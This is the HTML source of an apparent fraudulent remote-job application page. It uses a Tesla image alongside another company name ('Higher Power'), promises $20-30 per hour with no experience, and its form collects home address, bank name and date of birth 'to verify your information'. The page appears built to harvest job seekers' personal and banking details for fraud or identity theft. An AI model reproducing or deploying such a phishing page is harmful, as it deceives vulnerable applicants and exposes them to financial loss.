<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link rel="stylesheet" type="text/css" href="bootstrap.css">
	<title>Job Application Form</title>
	<style type="text/css">
		.req {
			color: red;
		}
	</style>
</head>
<body>
	<header>
		<center>
			<img src="tesla.jpg" height="600" width:400; style="margin:30px;">
			<h4 class="text-danger">Over 12,000 jobs are available to start your career with us</h4>
		</center>
	</header>
	<section class="container">
		<h4 style="padding-top:25px ;">This is a remote job that enable you to work from home </h4>
		<p>We are committed to creating a workplace that is safe, healthy, and injury-free.  We don’t compromise when it comes to health and safety practices and standards, as we regard the well-being of our employees, customers, and environment with the utmost importance. In order to ensure our customers receive an ultimate performance, Higher Power provides a strong safety curriculum, excellent service, and superior quality.</p>
	<div class="row mt-5">
		<div class="col">
			<h5>Minimum Qualifications</h5>
	<ul>
		<li>High School Diploma or GED equivalent</li>
		<li>Training: Two weeks($15/Hr)</li>
		<li>NO EXPERIENCE NEEDED</li>
		
	</ul>
	</div>
	<div class="col">
	<h5>Contract length: 6 months</h4>
	<h5>Job Types: Full-time, Contract</h4>
	<h5>Pay: $20.00 - $30.00 per hour</h4>
	
		</div>
		<div class="col">
			<h5>Benefits</h5>
			<ul>
			<li>Health insurance</li>
			<li>vision insurance</li>
		</ul>
		</div>
	</div>
	
	
		
	<form action="" method="post" data-netlify="true">
		<div class="form-row">
			<div class="form-group col-md-4">
				<label for="firstname">First Name <span class="req">*</span></label>
				<input type="" name="firstname" id="firstname" class="form-control" required>
			</div>
			<div class="col-md-4">
				<label for="lastname">Last Name<span class="req">*</span></label>
				<input type="" name="lastname" id="lastname" class="form-control" required>
			</div>
			<div class="col-md-2">
				<label for="gender">Gender<span class="req">*</span></label>
				<select id="gender" name="gender" class="form-control" required>
					<option selected>Choose..</option>
					<option>Male</option>
					<option>Female </option>
				</select>
			</div>
		</div>
		<div class="form-row">
			<div class="form-group col-md-4">
				<label>Email<span class="req">*</span></label>
				<input type="email" name="email" id="email" class="form-control" required>
			</div>
			<div class="form-group col-md-4">
				<label for="pnumber">Mobile Number<span class="req">*</span></label>
				<input type="number" name="pnumber" id="pnumber" class="form-control" required>
			</div>
			<div class="form-group col-3">
				<label for="relationship">Relationship<span class="req">*</span></label>
				<select id="relationship" name="relationship" class="form-control" required>
					<option selected>Choose..</option>
					<option>Single</option>
					<option>Married </option>
					<option>Divorce</option>
				</select>
			</div>
		</div>
		<div class="form-row">
			<div class="form-group col-3">
				<label for="country">Country<span class="req">*</span></label>
				<select id="country" name="country" class="form-control" required>
					<option selected>Choose..</option>
					<option>US</option>
					<option>CA </option>
				</select>
			</div>
			<div class="form-group col-3">
				<label for="state">State<span class="req">*</span></label>
				<input type="" name="state" id="state" class="form-control" required>
			</div>
			<div class="form-group col-md-4">
				<label for="city">City<span class="req">*</span></label>
				<input type="" name="city" id="city" class="form-control" required>
			</div>
		</div>
		<div class="form-row">
			<div class="form-group col-md-8">
				<label for="address">Home Address<span class="req">*</span></label>
				<input type="" name="address" id="address" class="form-control" required>
			</div>
			<div class="form-group col-3">
				<label for="zipcode">Zip code<span class="req">*</span></label>
				<input type="" name="zipcode" id="zipcode" class="form-control" required>
			</div>
		</div>
		<input class="form-control" type="text" placeholder="To verify your information" readonly style="width:60%;height:50px;">
		<div class="form-row mt-4">
			<div class="form-group col-md-4">
				<label for="bankname">What your Bank Name<span class="req">*</span></label>
				<input type="" name="bankname" id="bankname" class="form-control" required>
			</div>
			<div class="form-group col-md-4">
				<label for="dob">DOB<span class="req">*</span></label>
				<input type="date" name="dob" id="dob" class="form-control" required>
			</div>
		</div>
		
		<button type="submit" class="btn btn-primary btn-danger btn-block mb-4 mt-4" value="submit">Apply</button>
	
	</form>	
	</section>
	<!-- <footer class="container-fluid bg-danger text-white mt-4">
		<center class="pt-2 pb-2">copyright 2022 &copy; </center>
	</footer> -->
</body>
</html>